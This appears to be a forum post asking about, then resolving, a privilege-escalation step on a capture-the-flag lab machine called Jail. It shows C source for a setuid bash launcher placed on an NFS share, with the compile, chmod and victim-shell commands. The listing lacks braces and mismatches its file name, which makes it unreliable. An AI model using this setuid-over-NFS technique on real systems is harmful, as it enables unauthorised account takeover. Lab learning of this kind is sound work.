The owner of a setuid binary is determined by the uid (not the username), right?

I’m on the step of Jail (insane) where I need to priv esc from nobody to frank by having nobody run the setuid binary that frank owns. The problem is that frank’s uid is 1000, but my uid is also 1000. Even though the setuid binary I created says it’s owned by me and not frank, ls -n says it’s owned by 1000, so the names shouldn’t matter, right?

Here’s more specifics of what I did:

└─$ cat setuid.c
#include <unistd.h>
int main()
    execl("/bin/bash", "bash", (char *)NULL);
    return 0;

└─$ gcc setuid2.c -o setuid2

└─$ chmod u+s setuid2

└─$ ls -la | grep setuid2
-rwsr-xr-x  1 zander zander 16664 Feb  9 17:11 setuid2
-rw-r--r--  1 zander zander   120 Feb  9 17:11 setuid2.c

└─$ ls -n | grep setuid2
-rwsr-xr-x 1 1000 1000 16664 Feb  9 17:11 setuid2
-rw-r--r-- 1 1000 1000   120 Feb  9 17:11 setuid2.c

└─$ cp setuid2 var

(var is the dir I mounted /var/nfsshare to)

On the victim machine:

bash-4.2$ $ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
bash-4.2$ $ /var/nfsshare/setuid2
bash-4.2$ $ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)

I tried to change my name to frank or uid to 1002 but I can’t change anything because my username “is currently used by process X.”

Can anyone think of a workaround?

I figured it out! I guess copying setuid2 to the mounted var share somehow changed the permissions. I ended up installing kali-root-login, logged in as root, changed my name to frank, then logged back in as frank. I did the same exact steps as above but it still didn’t work, which ruled out the name of the owner as the cause.

Then I tried creating the setuid file in the mounted var share and got it to work. So copying it over must have been the issue but it’s hard to tell because I don’t have read permissions on the shared dir on either end, even after rooting the box because of root squashing.